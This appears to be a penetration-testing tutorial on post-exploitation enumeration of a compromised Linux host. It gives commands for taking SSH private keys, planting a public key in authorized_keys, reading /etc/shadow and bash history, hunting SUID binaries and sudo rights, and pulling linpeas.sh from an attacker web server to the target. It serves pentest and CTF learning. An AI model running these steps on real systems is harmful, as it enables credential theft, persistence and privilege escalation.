Basic enumeration vectors after getting a reverse shell on the Linux machine

Basic enumeration vectors after getting a reverse shell on the Linux machine

Problem:

After getting reverse shell access on the target machine you can get lost in deciding where to move further in order to escalate your privileges. You have to enumerate the machine thoroughly and enumeration is an important step in this process. You need to have established methodology in finding clues to help you in capturing the target machine.

Basic enumeration methodology:

  1. After getting the reverse shell first thing you need to stabilize it. See here.
  2. Enumerate the most important files on Linux OS and try to identify possible security flaws
  3. Check the most sensitive files under /etc directory
  4. If necessary use automated enumeration scripts like Linpeas and LinEnum

Check .ssh directory for SSH keys:

  1. Check .ssh directory if it has SSH keys stored inside and you have write permission for directory:
    cd ~/.ssh
    ls -al
    
  2. If it has secret keys copy them to your attacking machine and use them:
    chmod 600 [secret_key]
    chmod 600 id_rsa
    ssh -i [secret_key] [username]@[target_machine_ip]
    ssh -i id_rsa user@10.10.20.53
    
  3. In case there are no keys on the target machine, you can generate your keys on your machine and then transfer them to the target:
    cd ~/.ssh
    ssh-keygen
    
  4. Copy the content of your public key and transfer it to the inside of authorized_keys file in ~/.ssh folder on the target machine:
    # On target machine
    cd ~/.ssh
    # If authorized_keys file is note present, create it
    touch authorized_keys
    vim authorized_keys
    # Paste your public key, close and save the file
    

System enumeration

  1. Check all info about the system and user:
    id
    uname -a
    
  2. Check ~/.bash_history file which keeps track of user command history:
    cat ~/.bash_history
    
  3. Check .bash_profile and .bashrc files for containing unusual shell commands for files and binaries:
    cat ~/.bash_profile
    cat ~/.bashrc
    
  4. Check sudo command version as some versions may be vulnerable to privilege escalation:
    sudo -V
    
    sudo
  5. Check if user can run any commands on the system with sudo:
    sudo -l
    
    If yes, find exploits at GTFObins and use them to escalate.

Check files under /etc directory:

  1. Check /etc/passwd file, which stores information required for user login process:
    cat /etc/passwd
    user:x:1003:1003:,,,:/home/user:/bin/bash
    # x - character indicates that an encrypted account password is stored in /etc/shadow file and cannot be displayed in the plain text
    # 1003 - User ID (UID): Each non-root user has his own UID (1-99). UID 0 is reserved for root.
    # 1003 - Group ID (GID)
    # ,,, - User ID Info comment field
    # /home/user - user's home directory
    # /bin/bash - path of a command or shell that is used by the user
    
  2. If you have write access on /etc/passwd file you can escalate by creating a custom entry with root privileges. More info here.
  3. Check /etc/shadow file which stores password hashes for user accounts.
    cat /etc/shadow
    user:$6$1FiLdnFwTwNWAqYN$WAdBGfhpwSA4y5CHGO0F2eeJpfMJAMWf6MHg7pHGaHKmrkeYdVN7fD.AQ9nptLkN7JYvJyQrfMcfmCHK34S.a/:18483:0:99999:8:::
    # user - Username
    # $6$1FiLdnFwT... - Password hash
    # $1$ - MD5 hash
    # 18483 - Unix epoch time indication when last password change was
    # 0 - Minimum number of days for password change
    # 99999 - Maximum number of days the password is valid
    # 8 - The number of days before  the user will be warned about changing the password
    
  4. Check /etc/hosts file for any unusual network entries

Use find command to search for vulnerable files

  1. Look for .log, .conf and backup .bak files:
    # Use find for searching log files on the system
    find -type [file_type] -name [file_name] 2>/dev/null 
    find -type f -name *.log 2>/dev/null
    
    Most common file extensions are:
    .a   : a static library ;
    .au    : an audio file ;
    .bin :    a) a binary image of a CD (usually a .cue file is also included); b) represents that the file is binary and is meant to be executed ;
    .bz2 :    A file compressed using bzip2 ;
    .c :    A C source file ;
    .conf :  A configuration file. System-wide config files reside in /etc while any user-specific configuration will be somewhere in the user’s home directory ;
    .cpp :  A C++ source file ;
    .deb :  a Debian Package;
    .diff :   A file containing instructions to apply a patch from a base version to another version of a single file or a project (such as the linux kernel);
    .dsc:   a Debian Source information file ;
    .ebuild : Bash script used to install programs through the portage system. Especially prevalent on Gentoo systems;
    .el :  Emacs Lisp code file;
    .elc :  Compiled Emacs Lisp code file;
    .gif :    a graphical or image file;
    .h :a C or C++ program language header file;
    .html/.htm  :   an HTML file;
    .iso :    A image (copy) of a CD-ROM or DVD in the ISO-9660 filesystem format;
    .jpg :    a graphical or image file, such as a photo or artwork;
    .ko :    The kernel module extension for the 2.6.x series kernel;
    .la :    A file created by libtool to aide in using the library;
    .lo :    The intermediate file of a library that is being compiled;
    .lock :    A lock file that prevents the use of another file;
    .log :    a system or program’s log file;
    .m4 :    M4 macro code file;
    .o :    1) The intermediate file of a program that is being compiled ; 2) The kernel module extension for a 2.4 series kernel ; 3)a program object file;
    .pdf :    an electronic image of a document;
    .php :     a PHP script;
    .pid :    Some programs write their process ID into a file with this extention;
    .pl :    a Perl script;
    .png :    a graphical or image file;
    .ps :    a PostScript file; formatted for printing;
    .py :    a Python script;
    .rpm :    an rpm package. See Distributions of Linux for a list of distributions that use rpms as a part of their package management system;
    .s :    An assembly source code file;
    .sh :    a shell script;
    .so :     a Shared Object, which is a shared library. This is the equivalent form of a Windows DLL file;
    .src  :    A source code file. Written in plain text, a source file must be compiled to be used;
    .sfs :    Squashfs filesystem used in the SFS Technology;
    .tar.bz2 , tbz2, tar.gz :     a compressed file per File Compression;
    .tcl :    a TCL script;
    .tgz :     a compressed file per File Compression. his may also denote a Slackware binary or source package;
    .txt :    a plain ASCII text file;
    .xbm :    an XWindows Bitmap image;
    .xpm :     an image file;
    .xcf.gz, xcf :  A GIMP image (native image format of the GIMP);
    .xwd :    a screenshot or image of a window taken with xwd;
    .zip :extension for files in ZIP format, a popular file compression format;
    .wav :    an audio file.
    
  2. Search for files with SUID bit set:
    SUID - is a type of permission that allows users to execute a file with the permissions of another user.
    find / -perm -u=s -type f 2>/dev/null
    # -u=s searches for files with SUID bit set.
    
    If files are found, exploit them with GTFObins.

Check for unusual network connections on the host:

The netstat command generates displays that show network status and protocol statistics.

netstat -tulpn

Use automated scripts for enumeration:

  1. Transfer linpeas.sh script to the target machine and execute it:
    # ON YOUR MACHINE
    cd
    wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
    # START WEB SERVER, DEFAULT PORT 8000
    python3 -m http.server
    # ON THE TARGET MACHINE
    wget [your_machine_ip]:8000/linpeas.sh
    wget 10.1020.53:8000/linpeas.sh
    chmod +x linepeas.sh
    ./linpeas.sh
    
  2. Use more lightweight LinEnum.sh script. Transfer it to the target the same way as for linpeas.sh
    More info can be found here
    wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
    

Reference:

  1. Understanding the /etc/shadow File
  2. Most common linux file extensions
  3. Port Forwarding